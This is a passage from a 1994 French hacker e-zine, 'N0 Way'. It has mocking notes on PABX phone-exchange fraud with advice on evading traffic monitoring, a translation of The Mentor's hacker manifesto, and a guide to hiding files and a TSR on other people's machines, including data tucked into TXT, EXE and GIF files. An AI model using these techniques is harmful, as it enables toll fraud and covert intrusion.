r‚sum‚: voir si ya pas un employ‚ qu'est parti … la concurrence.
|
||
|
||
3ø) les types de pirate:
|
||
A) detournement d'une ligne pour t‚l‚phoner [ ouais !!!!! Beige Box rules ]
|
||
B) detournement d'une ligne pour appeler des serveurs Nitel [ kewl ! ]
|
||
C) ecoute des communications [ c'est vous qui le dite ;) ]
|
||
D) Le pirate informatique, vol d'information [ bande de paranos, on
|
||
en a rien a foutre de votre bilan commercial cumul‚ sur l'effectif
|
||
diff‚r‚ r‚troactif.... tout ce qu'on veut c'est VOTRE SYSTEME !! ;) ]
|
||
E) Le sabotage des systŠmes [ ya que les burnes qui font ca ! ]
|
||
F) Le pirate sportif [ ouais !!!!! ca c'est kewl ! ]
|
||
|
||
A) detournement d'une ligne pour t‚l‚phoner [ ouais !!!!! Beige Box rules ]
|
||
Objectif: telephoner gratuitement … cout moindre
|
||
[ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ]
|
||
[ mais il ‚tait raide bourr‚ le mec qui a ]
|
||
[ ‚crit cela !!!! hahaha... je suis pete de rire ]
|
||
Ce detournement peut etre volontaire: [ plutot oui! ]
|
||
- programmation volontaire sur un poste ou dans le pabx.
|
||
- appel d'un auxiliaire du PABX, messagerie vocale par exemple,
|
||
pour ressortir vers l'exterieur.
|
||
Pour un appel vers l'etranger, le pirate sera tax‚ de son
|
||
domicile au PABX pirat‚. Ce dernier sera tax‚ pour la ligne
|
||
‚tablie jusqu'… l'‚tranger.
|
||
ou involontaire: [ on y croit ! ]
|
||
mauvaise affectation des taxes sur les postes.
|
||
- lors de l'utilisation de la fonction conference
|
||
- transfert
|
||
- renvoi
|
||
|
||
B) Detournement pour appeler des serveurs minitel:
|
||
le detournement dans ce cas est generalement volontaire [ ouahahahaha ]
|
||
La m‚thode consiste … appeler le PABX d'une soci‚t‚:
|
||
- obtenir une ligne sur le PABX
|
||
- surnum‚roter cette ligne
|
||
- ressortir vers l'exterieur.
|
||
- obtenir la liaison avec un serveur.
|
||
|
||
C) Ecoute teleph
|
||
[ c'est chiant, je tape pas ces conneries ! ]
|
||
|
||
D) Le pirate informatique, vol d'information
|
||
|
||
PIRATE ===> PABX soci‚t‚ A
|
||
||
|
||
||
|
||
\/
|
||
Central FT ville 1 =====> Central FT Ville 2
|
||
||
|
||
||
|
||
\/
|
||
Site informatique pirat‚.
|
||
|
||
[ comme ca la trace est remont‚e plus difficilement ]
|
||
|
||
E) Le sabotage des systŠmes
|
||
[ PFFFF..... ]
|
||
|
||
F) Le pirate sportif [ La le mec sait ce qu'il dit ! ]
|
||
Objectif du pirate: l'argent n'est pas la motivation principale,
|
||
du moins au d‚part.
|
||
buts: * se connecter … un max de systŠme
|
||
* penetrer par jeu
|
||
* s'introduire au coeur meme du systŠme par d‚fi
|
||
methode utilis‚ee:
|
||
* recherche des num‚ros d'appel
|
||
* recherche de mot de passe
|
||
* contourner les protections
|
||
* acceder aux fonctions interdites
|
||
|
||
Son but n'est pas de casser. Il peut seulement souhaiter utiliser des
|
||
heures machines ou des donn‚es.
|
||
Peu dangereux, il peut le devenir si: [ jamais vu cela ! ]
|
||
- il donne ses infos … des tiers sans scrupules
|
||
- des soci‚t‚ concurrentes
|
||
- il est recrut‚ pour l'argent
|
||
|
||
4ø)
|
||
A) Piratage physique des lignes analogiques
|
||
|
||
FT Central FT
|
||
||
|
||
-------------------- ||
|
||
\/
|
||
Soci‚t‚ PABX
|
||
||
|
||
\/
|
||
-------------------- repartiteur dans la cabine PABX. *
|
||
||
|
||
Immeuble de la soci‚t‚ ||
|
||
\/
|
||
repartiteur g‚n‚ral * $
|
||
||
|
||
||
|
||
\/
|
||
sous repartit d'‚tage * $
|
||
||
|
||
||
|
||
\/
|
||
poste tel . * $
|
||
|
||
[ une * == point de piratage physique possible en analogique ]
|
||
[ un $ == point de piratage physique possible en num‚rique ]
|
||
|
||
Piratage physique des lignes.
|
||
a) methode simple et a peu de frais. Possibilit‚ de se connecter sur
|
||
tous les points du cheminement de la sortie du central au point
|
||
final d'implantation du poste.
|
||
b) Dans le cas d'un raccordement num‚rique du PABX, il ne sera pas
|
||
possible de se raccorder sur le cheminement du central … la soci‚t‚.
|
||
Un piratage de ce type necessite un equipement d'un cout tres
|
||
dissuasif.
|
||
La partie sensible se situe donc entre le PABX et la prise murale ou
|
||
est connect‚ le poste analogique. Le pirratage ne pourra etre fait
|
||
qu'a L'INTERIEUR de l'immeuble.
|
||
c) Dans le cas d'une liaison num‚rique de bout en bout, le piratage …
|
||
peu de frais deviens impossible [Ah ouais? t'veux une contre preuve?]
|
||
|
||
|
||
B) Piratage des fonctionnalit‚s du PABX
|
||
Nous avons ici deux types de piratage possible:
|
||
* volontaire avec les fonctionnalit‚s disponible dans le PABX.
|
||
* involontaire : affectation des taxes a un autre poste que le sien
|
||
sans l'avoir voulu.
|
||
Il s'agit le plus souvent de mauvais parametrage lors de la
|
||
programmation ou des erreurs dans le logiciel lors de sa conception.
|
||
|
||
Exemple concret li‚ … un bug:
|
||
si l'initiateur d'unee conference avec deux correspondant exterieurs
|
||
raccroche en premier, question:
|
||
- est ce que les deux autres personnes seront coup‚es
|
||
- Si la r‚ponse est non qui sera taxe?
|
||
Idem dans le cas d'un appel transf‚r‚ vers l'exterieur.
|
||
|
||
Les fonctionnalit‚s concern‚es sont:
|
||
* conference: verifier si les corresp. st coup‚s qd l'initiateur
|
||
raccroche
|
||
* transfert : lors des transferts interne, verifier si la repartition
|
||
des taxes s'effectue correctement.
|
||
* renvoi: avec un MIC T2 grand confort, il est possible de renvoyer les
|
||
communication vers l'exterieur.
|
||
* recuperation des fonctionnalit‚ d'un poste de direction par un code
|
||
et son mot de passe. Cette fonction permet a partir de n'importe quel
|
||
poste de la soci‚t‚ de r‚cup‚rer le 19 en affectant le ticket de
|
||
taxation au poste directeur.
|
||
|
||
C) Piratage par telemaintenance.
|
||
[ce qui suit est ma description des schemas:
|
||
Fonction de t‚l‚maintenance:
|
||
* Controle de qualit‚ d'une ligne : permet d'appeler n'importe quel
|
||
num‚ro.
|
||
* Programmation d'un poste fantome puis renvoi. ]
|
||
a) il est possible d'appeler un PABX et de se faire rappeler
|
||
simultanement. Le but est de contr“ler l'‚tablissement de la
|
||
liaison et de mesurer sa qualit‚:
|
||
- en affaiblissement
|
||
- en paradiaphonie
|
||
- en reverberation
|
||
Au lieu de se faire rappeler sur le site de contr“le, un
|
||
technicien peut en profiter pour appeler un correspondant …
|
||
l'‚tranger ou des serveurs minitel.
|
||
Les taxes seront donc affect‚ au site control‚!
|
||
b) Il est possible par telemaintenance de d‚clarer par programmation un
|
||
poste dit fantome dans un PABX distant.
|
||
Il existe dans la machine mais il n'est physiquement pas pr‚sent sur
|
||
le site.
|
||
|
||
D) Piratage d'un auxiliaire d'un PABX.
|
||
Ce type de piratage est possible par le biais des options install‚es
|
||
sur un autocommutateur t‚l‚phonique.
|
||
Sont concern‚s:
|
||
* serveurs vocaux
|
||
* messageries vocales
|
||
* les op‚rateurs automatiques
|
||
|
||
Moyen de protection: Sur incident, appel non abouti il est souhaitable
|
||
de r‚orienter les appels vers la standardiste. Cette pr‚caution
|
||
empˆche un correspondant exterieur de surnum‚roter pour rappeler un
|
||
autre poste … travers le PABX.
|
||
|
||
E) Piratage par une base TSF.
|
||
[ bof, je tape pas ca:
|
||
On passe dans les couloirs de la soci‚t‚ avec un t‚l‚phone sans fil
|
||
et on essaye d'accrocher une base ! ]
|
||
|
||
5ø)
|
||
A) acces aux locaux:
|
||
[ resum‚: - salle PABX ferm‚e
|
||
- acces control‚s
|
||
- que des techniciens habilit‚s.
|
||
- mm ch pr la salle d'exploit.
|
||
- gaines techniques fermees
|
||
- cabine de sous repartition control‚e et surveill‚e
|
||
- chemins de cable visibles cercl‚s et couverts!
|
||
B) protec des infos.
|
||
Enferm‚ dans des armoires:
|
||
- derniere programmation
|
||
- support annuaire technique
|
||
- la composition des tetes PTT
|
||
- la composition du systeme ne doit pas etre divulgu‚ surtout si des
|
||
auxiliaires sont raccord‚s derriere le PABX.
|
||
|
||
Attention:
|
||
Les microordinateurs envoy‚s en r‚paration, peuvent contenir des
|
||
informations sensibles:
|
||
- annuaire technique complet
|
||
- annuaire extern
|
||
- liste des num‚ros abr‚g‚s
|
||
- liste des techniciens habilit‚s.
|
||
- liste des mots de passe
|
||
- la taxation contenant tous les num‚ros appel‚s.
|
||
|
||
C) Destruction des supports obsolete:
|
||
[ en bref, on passe tout au broyeur et DELETE et FORMAT ne sont pas
|
||
effectifs ! ]
|
||
|
||
D) Sauvegarde
|
||
|
||
6ø) Les moyens de contr“le:
|
||
A) La taxation telephonique:
|
||
[ sch‚ma montrant une imprimante connect‚e au modem de maintenance du
|
||
PABX avec consoles d'observ du trafic, de taxation et console systeme PABX
|
||
ainsi qu'une messagerie vocale.
|
||
]
|
||
Doit permettre un controle sur une periode param‚trable pour les appels
|
||
‚mis par poste, service, direction.
|
||
* a l'etranger
|
||
* en province
|
||
* en local
|
||
|
||
B) Observ. du trafic:
|
||
permet de reperer les lignes modem du PABX appel‚es en dehors des
|
||
heures ouvrables.
|
||
[ ***CONCLUSION*** ***IMPORTANTE*** DONC :
|
||
SCANNEZ LA NUIT MAIS ------> *** UTILISEZ LE JOUR *** ]
|
||
Tres utile en cas de piratage du PABX pour determiner les faisceaux
|
||
utilis‚s pour entrer et ressortir a travers le PABX et ses auxiliaires.
|
||
|
||
Afin de faciliter ce rep‚rage, il est possible d'extraire les appels
|
||
ressortantss dans la meme minute que les appels quii arrivent sur le
|
||
PABX.
|
||
Cette possibilit‚ facilite grandement l'analyse si des temporisations
|
||
n'ont pas ‚t‚ program‚es.
|
||
|
||
Les tickets des appels ‚mis par un PABX et non compris par le PC
|
||
d'observation de trafic doivent etre stock‚s pour traitement ult‚rieur.
|
||
|
||
Ne pas oublier que la puissance de traitement d'un systeme p‚riph‚rique de
|
||
taxation ou d'observation t‚l‚phonique est li‚e … la richesse des
|
||
informations d‚livr‚es par le PABX d'un constructeur.
|
||
|
||
Exemple: si le PABX n'a que des compteurs pour les emissions et les
|
||
receptions d'appels, il sera impossible de faire un horodatage et de
|
||
determiner les heures de pointes.
|
||
|
||
--
|
||
Fin de la premiŠre partie
|
||
--
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.5
|
||
|
||
|
||
\/\La Conscience d'un hacker/\/
|
||
|
||
par
|
||
|
||
+++The Mentor+++
|
||
|
||
Ecrit le 8 Janvier 1986
|
||
|
||
Traduit par NeurAlien le 8 septembre 1994.
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
Un autre s'est fait prendre aujourd'hui, c'est partout dans les
|
||
journaux. "Scandale: Un adolescent arret‚ pour crime informatique",
|
||
"Arrestation d'un 'hacker' aprŠs le piratage d'une banque"...
|
||
Satan‚s gosses, tous les mˆmes.
|
||
|
||
Mais avez vous, dans votre psychologie en trois piece et votre profil
|
||
technocratique de 1950, un jour pens‚ … regarder le monde derriere les yeux
|
||
d'un hacker? Ne vous etes vous jamais demand‚ ce qui l'avait fait agir,
|
||
quelles forces l'avaient model‚?
|
||
Je suis un hacker, entrez dans mon monde...
|
||
Le mien est un monde qui commence avec l'‚cole... Je suis plus
|
||
astucieux que la pluspart des autres enfants, les conneries qu'ils m'apprennent
|
||
me lassent...
|
||
|
||
Je suis au collŠge ou au lyc‚e. J'ai ‚cout‚ les professeurs expliquer
|
||
pour la quizieme fois comment r‚duire une fraction. Je l'ai compris.
|
||
"Non Mme Dubois, je ne peux pas montrer mon travail. Je l'ai fait dans ma tˆte"
|
||
Satan‚ gosses. Il l'a certainnement copi‚. Tous les mˆmes.
|
||
|
||
J'ai fait une d‚couverte aujourd'hui. J'ai trouv‚ un ordinateur.
|
||
Attends une minute, c'est cool. Ca fait ce que je veux. Si ca fait une
|
||
erreur, c'est parce que je me suis plant‚.
|
||
Pas parce qu'il ne m'aime pas...
|
||
Ni parce qu'il se sent menac‚ par moi...
|
||
Ni parce qu'il pense que je suis petit filoux...
|
||
Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas ˆtre l…...
|
||
Satan‚s gosses. Tout ce qu'il fait c'est jouer. Tous les mˆmes.
|
||
|
||
Et alors c'est arriv‚... une porte s'est ouverte sur le monde... Se
|
||
pr‚cipitant a travers la ligne t‚l‚phonique comme de l'h‚roine dans les veines
|
||
d'un accro, une impulsion electronique est envoy‚e, on recherche un refuge …
|
||
l'incompetence quotidienne... un serveur est trouv‚.
|
||
|
||
Vous vous repetez que nous sommes tous pareils... On a ‚t‚ nourri … la
|
||
petite cuillere de bouffe pour b‚b‚ … l'‚cole quand on avait faim d'un steak...
|
||
Les fragments de viande que l'on nous a laiss‚ ‚taient pr‚-mach‚s et sans gout.
|
||
On a ‚t‚ domin‚ par des sadiques ou ignor‚ par des apathiques. Les seuls qui
|
||
avaient des choses … nous apprendre trouvŠrent des ‚lŠves volontaires, mais
|
||
ceux ci sont comme des gouttes dans le desert.
|
||
|
||
C'est notre monde maintenant... Le monde de l'‚l‚ctron et de
|
||
l'interrupteur, la beaut‚ du baud. Nous utilisons un service d‚ja existant,
|
||
sans payer ce qui pourrait ˆtre bon march‚ si ce n'‚tait pas la propri‚t‚
|
||
de gloutons profiteurs, et vous nous appelez criminels. Nous explorons... et
|
||
vous nous appelez criminels. Nous recherchons la connaissance... et vous nous
|
||
appelez criminels. Nous existons sans couleur de peau, sans nationalit‚, sans
|
||
dogme religieux... et vous nous appelez criminels.
|
||
Vous construisez des bombes atomiques, vous financez les guerres,
|
||
vous ne punissez pas les patrons de la mafia aux riches avocats,
|
||
vous assassinez et trichez, vous manipulez et nous mentez en essayant de nous
|
||
faire croire que c'est pour notre propre bien ˆtre, et nous sommes encore des
|
||
criminels.
|
||
|
||
Oui, je suis un criminel. Mon crime est celui de la curiosit‚. Mon
|
||
crime est celui de juger les gens par ce qu'ils pensent et dise, pas selon leur
|
||
apparence.
|
||
Mon crime est de vous surpasser, quelque chose que vous ne me pardonnerez
|
||
jamais.
|
||
|
||
Je suis un hacker, et ceci est mon manifeste. Vous pouvez arreter cet
|
||
individu, mais vous ne pouvez pas tous nous arreter...
|
||
aprŠs tout, nous sommes tous les mˆmes.
|
||
|
||
+++The Mentor+++
|
||
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.6
|
||
|
||
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||
º Data dissimulation techniques: º
|
||
º ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ º
|
||
º Hiding your data in º
|
||
º a Restricted and Patrolled º
|
||
º District of CyberSpace. º
|
||
º ------------------------------ º
|
||
º Written by Arscene º
|
||
º for N0Way º
|
||
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||
|
||
I) Intro & Thanks & Disclaimer
|
||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
Dans la, heum, discipline, qui est la notre il arrive souvent que
|
||
nous ayions a dissimuler une certaine quantit‚ de Data sur un
|
||
systeme que nous visitions, ou qui possede des resources auquelles
|
||
nous n'avons pas access, et generalement dont il ne profite pas
|
||
pleinement. Il nous arrive aussi d'avoir a communiquer dans un
|
||
environnement peu sur et control‚ par des individus paranoiaques et
|
||
megalomanes. C'est pour ces deux raisons que j'ai ecrit ce file.
|
||
Il s'adresse a tous, et j'espere qu'il vous sera utile (Que j'ai
|
||
pas pass‚ des nuits blanches pour rien, quoi).
|
||
Remerciements/greets/good_karma a NeurAlien, Omega et O'Connell
|
||
pour etre qui ils sont.
|
||
GreetZ a tous les lecteurs de N0Way. N'oubliez pas que l'avenir;
|
||
c'est vous. Et que vous etes defini par vos actions, et non votre
|
||
pass‚.
|
||
This file also dedicated to Mr Toubon for his open mindedness and
|
||
his efforts towards harmonious internationalisation. Also to Mr
|
||
Pasqua for his efforts to preserve peace at all cost and his
|
||
unswaying belief in the principles of democracy, justice, and
|
||
freedom.
|
||
Bon, je suis sur que NeurAlien vas nous faire une superbe
|
||
Disclaimer qui couvre tout, mais j'aimerais rajouter la mienne:
|
||
|
||
De ce texte complet, je n'ais ecrit et pens‚ que ces trois lignes.
|
||
Dans ces trois lignes, une et une seule est un mensonge.
|
||
Avant-hier, j'ai pens‚ voir un OVNI.
|
||
|
||
Faites moi du mail sur ce que vous pensez de ce Disclaimer, et vos
|
||
id‚es pour faire mieux.
|
||
|
||
II) Cacher un file dans le OS
|
||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
Bon, d'abord les principes de base. Si vous etes sur un systeme '‚tranger'
|
||
(dont vous n'avez pas le controle complet), il arrive que vous vouliez
|
||
posseder quelques files (fichiers), sans que les autres users, ou meme le
|
||
Supervisor, ne le sache. Il faut donc les cacher.
|
||
|
||
1) Les attributs de systeme:
|
||
|
||
La, on pense tout de suite aux attributs speciaux de fichiers (Cach‚ ou
|
||
Systeme, sous MS-DOS). Mais, si ces attributs font partie du systeme ils
|
||
sont tres connus, et bon nombre de programmes peuvent les modifier, ou les
|
||
ignorent tout simplement. Ils servent en general a proteger l'utilisateur
|
||
de lui meme, en evitant par exemple qu'il n'efface des fichiers systemes.
|
||
Par exemple: Cr‚‚z un fichier DOS puis faites soit ATTRIB +H ou ATTRIB +S
|
||
dessus, et allez dans le file manager de Windows (Vous ne l'utilisez peut
|
||
etre pas souvent, mais le proprietaire de systeme si). Allez sur le
|
||
drive/dir ou est votre fichier cach‚. Normalement vous ne le voyez pas.
|
||
Vous ne pouvez pas non plus l'effacer.
|
||
Maintenant allez dans Affichage/Par type de fichiers. Cliquez sur
|
||
'Visualiser les fichiers systemes/cach‚s'. En revenant a l'ecran principal
|
||
vous devriez voir votre fichier, mais en plus il aura un point
|
||
d'exclamation rouge a cot‚ de son nom, et il n'est plus tres discret
|
||
maintenant.
|
||
De meme, si vous avez LapLink 3 (recommand‚), vous avez surement remarqu‚
|
||
qu'il affiche les fichiers normaux en gris-DOS standard, mais les fichiers
|
||
cach‚s ou systemes sont affich‚s en Blanc (High intensity) avec un '*'
|
||
devant leur nom. Ideal pour se faire reperer.
|
||
|
||
2) Le choix:
|
||
|
||
Les attributs du systeme peuvent donc soit bien dissimuler le fichier,
|
||
soit le rendre tres evident. Il y a donc un choix a faire. Pensez vous que
|
||
la/les personnes a qui vous voulez dissimuler le fichier seront assez
|
||
intelligentes pour cliquer sur le bouton ? (C'est une vraie question, pas
|
||
une question rhetorique). La reponse par default, dans mon cas, est Oui. Je
|
||
prefere ne pas cacher mes files et utiliser d'autres options.
|
||
|
||
3) Tout en haut de l'arbre:
|
||
|
||
Comme un object cach‚ dans un arbre, un file cach‚ profond en haut de
|
||
l'arbre est plus dur a reperer que si vous le laissiez dans la racine. En
|
||
regle generale il ne faut rien mettre dans la racine, et preferer au moins
|
||
2 niveaux de profondeure. Voici un exemple:
|
||
Pour une raison qui m'est propre je devais charger un TSR sur une PC en
|
||
reseau Novell. Il fallait une ligne dans l'autoexec, et un endroit ou
|
||
mettre le fichier sur le disque dur. Cette machine etait frequement utilis‚
|
||
par le SUPERVISOR (on se demande ce que faisait le TSR, hum ;-)) et
|
||
l'AUTOEXEC.BAT lan‡ait un antivirus resident qui scannait la racine
|
||
de C: au demarage. Les noms des fichiers sur C:\ s'affichant
|
||
pendant le scan. J'ai donc mis le fichier dans C:\DOS. Ainsi il
|
||
n'etait pas remarqu‚ par le scan, et la ligne dans l'autoexec ne
|
||
paraissait pas suspecte car l'autoexec.bat sert justement a charger
|
||
des programmes du repertoire DOS. Cet exemple me permet d'ajouter
|
||
qu'il faut toujours essayer de placer un fichier parmi ses
|
||
semblables, du moins exterieurement (j'y reviendrait en 4).
|
||
|
||
Un autre exemple: J'avais un fichier de +4Mo a dissimuler sur un poste en
|
||
local, le temps que je puisse amener de quoi le backup et le ramener chez
|
||
moi. Je l'ai mis dans C:\EXCEL\EXEMPLES\AUTRE, il y a de cela au moins 6
|
||
mois. A derniŠre verification il y etait encore. Peu de gens s'aventurent
|
||
haut dans un arbre, surtout s'il parait conforme. Une petite note quand
|
||
meme: N'en faites pas trop. Il ne faut pas que le chemin soit sensiblement
|
||
plus long que la moyenne sur le disque, car un backup ou un TREE pourrait
|
||
le reperer aisement.
|
||
Pour clore cette partie il me faut reserver une mention speciale a nos
|
||
amis de chez M$, et plus particulierement le repertoire WINDOWS\SYSTEM.
|
||
Celui-ci existe sur la grande majorit‚ des machines, peut etre meme la
|
||
votre. Combien d'entre vous savent combien de fichiers ils ont dans ce
|
||
repertoire, et ce que fait chaque fichier ? En gros, on peut TOUT fourrer
|
||
dans ce repertoire, si ce n'est ni trop gros ni trop voyant. Personne ne
|
||
s'en rendra compte.
|
||
|
||
4) "A rose by any other name would smell as sweet"
|
||
|
||
Pour ceux qui n'auraient pas compris ma citation de Shakespeare, Juliet
|
||
dit qu'une rose, meme si on changait son nom, aurait quand meme la (bonne)
|
||
odeure d'une rose. Mais un file ne sent pas, d'ou l'interet de changer son
|
||
nom pour le dissimuler (Logique suspecte).
|
||
Un nom qui fasse temporaire ( *.$$$, ~*.TMP, etc) est assez bon pour une
|
||
courte periode, mais un sys/user intelligent risque de l'effacer au bout
|
||
d'un moment. Un nom invent‚ est bon, de preference un nom qui ne soit pas
|
||
comprehensible, de sorte a faire fichier systeme. Explication: En general
|
||
un user va essayer de lire un file du nom README.NOW, il lira probablement
|
||
le file WHATEVER.TXT, peut etre pas WHATEVER.DAT et surement pas PR4)Q567
|
||
sans extension.
|
||
Un nom de ce type est bon, mais ce n'est pas ce qui se fait de mieux. Le
|
||
nom devrait s'integrer a son environnement. Regardez se qui existe deja
|
||
dans les alentours. Par exemple j'ai mis deux fichiers (HACK et VIEW pour
|
||
ceux que cela interresse) dans le ROOT d'un drive ou il existait MENU1.OLD
|
||
et MENU2.OLD. Simplement en les appelent MENU3.OLD et MENU4.OLD ils sont
|
||
restes 'invisibles' pendant plus d'un mois (puis je les ais enlev‚).
|
||
CONFIG.OLD (ou .CPS ou .B~K) et la meme chose pour AUTOEXEC font de bon
|
||
depos temporaires. Pour une plus longue echeance essayer TD451.DRV dans
|
||
\WINDOWS\SYSTEM ou un truc du genre.
|
||
|
||
5) Conclusion (de part I)
|
||
|
||
Petite conclusion rapide. Les trois regles d'or pour planquer un file
|
||
sont:
|
||
- Le mettre ou en utilisation normale un user ne le verait meme pas.
|
||
- Que son nom s'integre a son environnement.
|
||
- Choisir un nom/extension que l'user ne penserait pas, en marche normale
|
||
a lire/ouvrir/lancer/etc.
|
||
Et en, heu, regle d'argent:
|
||
- Autant que possible, le crypter.
|
||
|
||
6) PS et PPS
|
||
|
||
PS: Si vous cryptez le file il ne faut PAS que cela soit apparent, par
|
||
exemple PGP met '----- BEGIN PGP MESSAGE -----' (ou un truc du
|
||
genre) au debut de ce qu'il crypte. Si un sys/user voit cela il
|
||
risque fort de le delete immediatement.
|
||
|
||
PPS: Dans la serie Revenge/Annoy si vous voulez simplement irriter le
|
||
sys/user dans ce cas faites tout le contraire de ce que dit ce file. Un
|
||
fichier de 8Mo du nom de SECRET.COD, OCCULT.SEX, VIRUS.XXX dans le ROOT,
|
||
completement crypt‚ (du garbage au hasard) avec en premiere ligne 'JF-DES
|
||
Crypted block. Checksum: 834A4C12' risque grandement d'amuser un sys/user,
|
||
surtout si il en retrouve des variantes subtiles partout sur son disque :-)
|
||
|
||
III) Cacher un file dans un autre
|
||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
Une technique encore plus subtile, et de par la meme meilleure, est de
|
||
cacher un file directement dans un autre. Le file 'host' devrait etre un
|
||
fichier anodin, qui a droit de residence legitime sur le systeme. Cela peut
|
||
permettre de dissimuler encore plus efficacement un file sur un systeme,
|
||
mais egalement (et probablement encore plus important) est que cette
|
||
technique permet de cr‚er un chemin sur entre 2 personnes a travers une
|
||
zone non-sure du CyberSpace. Exemple: Dans les interets de la securit‚
|
||
nationale et du peuple, un gouvernement debonnaire a rendu l'echange
|
||
d'informations crypt‚s ill‚gales. Non respet de cette loi vous
|
||
fera deport‚ en Antarctique. Mais, CyberPunk que vous etes, vous
|
||
devez envoyer vos C0deZ a quelqu'un. Vous ecrivez votre message,
|
||
le cryptez. Puis vous digitalisez une photo de votre maison,
|
||
inserez votre file dans la photo (en rempla‡ant le gresillement
|
||
(l'aglomeration urbaine derriŠre chez vous en low-res) du fond par
|
||
votre file crypt‚), puis vous U/L le tout a votre ami. Ce que je
|
||
viens de decrire est fiction, mais montre un peu les possibilit‚s
|
||
de cette technique, qui commence d'ailleurs a faire du bruit
|
||
(Remarquez l'allusion).
|
||
[ OUh ouh Arscene, ce n'est plus Fiction !!! Cypherella des cypherpunks l'a
|
||
fait sur Mac deja et j'ai eu des echos comme quoi la meme chose existe sur PC
|
||
et Unix pour int‚grer du code PGP a du JPEG et du GIF. ++NeurAlien]
|
||
|
||
1) Un peu de pratique
|
||
|
||
Voici quelque endroits, sur PC, ou un file pourrait etre cach‚:
|
||
|
||
- Dans un TXT: Un fichier TXT se finit par un CR, LF (qui font aller a la
|
||
ligne) et un marqueur de fin de fichier. En Hex, cela donne 0D 0A 1A.
|
||
Ajoutez ces 3 bytes a la fin d'un fichier TXT, puis ajoutez du text aprŠs,
|
||
et ni TYPE ni EDIT n'afficheront ce nouveau text. Voici en detail:
|
||
|
||
COPY CON FIRST.TXT
|
||
>Essai de text XXX^Z
|
||
(1 fichier ecrit)
|
||
[Editez ce fichier et remplacez les 3 X respectivement par 0D, 0A et 1A]
|
||
COPY CON TWO.TXT
|
||
>Text secret^Z
|
||
(1 fichier ecrit)
|
||
COPY FIRST.TXT + TWO.TXT /b FINAL.TXT
|
||
TYPE FINAL.TXT
|
||
Essai de text
|
||
|
||
Si vous ouvrez a nouveau FINAL.TXT dans votre editeur Hex vous verrez les
|
||
2 lignes. Cette technique n'est pas terrible en pratique (car un bon
|
||
editeur ASCII ou traitement de texte fera apparaitre tout le texte) mais
|
||
sert bien de demonstration
|
||
|
||
- Dans un EXE: Tout EXE commence par un header d'une longeure variable de
|
||
bytes, et avec l'utilisation rependue de compresseurs d'EXE le seul vrai
|
||
moyen de voir si un header est valide est de lancer l'EXE. Pour inclure ce
|
||
que vous voulez dans le header il suffit d'allonger sa taille. Cette taille
|
||
s'exprime en paragraphes (16 bytes = 1 pararaph), est un WORD et ce trouve
|
||
au 5Šme WORD du fichier (10Šme et 11Šme byte). AprŠs avoir ajout‚ la
|
||
longeure de votre fichier / 16 ( + un peu pour etre sur ) au header il
|
||
suffit d'inclure votre fichier a la fin de ce header. L'EXE devrait
|
||
toujours fonctionner sans probleme. Si vous compez automatiser l'operation,
|
||
il est bon d'inclure aussi la longeure du fichier en bytes et l'ancienne
|
||
longueure du header.
|
||
|
||
- Dans un GIF: Un GIF est form‚ de plusieures blocs. Un bloc commence par
|
||
soit par un ',', (une virgule quoi), si c'est une image, par ';' si c'est
|
||
la fin du fichier (bon, ok, c'est pas vraiment un bloc), ou par '!' si
|
||
c'est une extension. La, cela devient interressant. Une extension peut
|
||
etre n'importe quoi, un commentaire par exemple, en general un
|
||
viewer de GIF reconnait certaines extension, et ignore tout simplement les
|
||
valeures qu'il ne connait pas. D'ou l'id‚e de se faire un bloc 'Secret
|
||
info'.
|
||
Bon, comme aucun d'entre vous ne paye sa comm pour D/L N0Way, je peut sans
|
||
crainte vous balancer ces extraits des DOC officielles:
|
||
La premiŠre concerne les extensions GIF en general:
|
||
|
||
GIF Extension Blocks are packaged in a manner similar to that used
|
||
by the raster data though not compressed. The basic structure is:
|
||
7 6 5 4 3 2 1 0 Byte #
|
||
+---------------+
|
||
|0 0 1 0 0 0 0 1| 1 '!' - GIF Extension Block Introducer
|
||
+---------------+
|
||
| function code | 2 Extension function code (0 to 255)
|
||
+---------------+ ---+
|
||
| byte count | |
|
||
+---------------+ |
|
||
: : +-- Repeated as many times as necessary
|
||
|func data bytes| |
|
||
: : |
|
||
+---------------+ ---+
|
||
. . . . . .
|
||
+---------------+
|
||
|0 0 0 0 0 0 0 0| zero byte count (terminates block)
|
||
+---------------+
|
||
A GIF Extension Block may immediately preceed any Image Descriptor
|
||
or occur before the GIF Terminator.
|
||
All GIF decoders must be able to recognize the existence of GIF
|
||
Extension Blocks and read past them if unable to process the function
|
||
code.
|
||
|
||
La seconde concerne le bloc d'extension particulier qui nous
|
||
interresse:
|
||
|
||
26. Application Extension.
|
||
|
||
a. Description. The Application Extension contains application-specific
|
||
information; it conforms with the extension block syntax, as described
|
||
below, and its block label is 0xFF.
|
||
|
||
b. Required Version. 89a.
|
||
|
||
c. Syntax.
|
||
|
||
7 6 5 4 3 2 1 0 Field Name Type
|
||
+---------------+
|
||
0 | | Extension Introducer ['!'] Byte
|
||
+---------------+
|
||
1 | | Extension Label [0xFF] Byte
|
||
+---------------+
|
||
+---------------+
|
||
0 | | Block Size [11] Byte
|
||
+---------------+
|
||
1 | |
|
||
+- -+
|
||
2 | |
|
||
+- -+
|
||
3 | | Application Identifier 8 Bytes
|
||
+- -+
|
||
4 | |
|
||
+- -+
|
||
5 | |
|
||
+- -+
|
||
6 | |
|
||
+- -+
|
||
7 | |
|
||
+- -+
|
||
8 | |
|
||
+---------------+
|
||
9 | |
|
||
+- -+
|
||
10 | | Appl. Authentication Code 3 Bytes
|
||
+- -+
|
||
11 | |
|
||
+---------------+
|
||
|
||
+===============+
|
||
| |
|
||
| | Application Data Data Sub-blocks
|
||
| |
|
||
| |
|
||
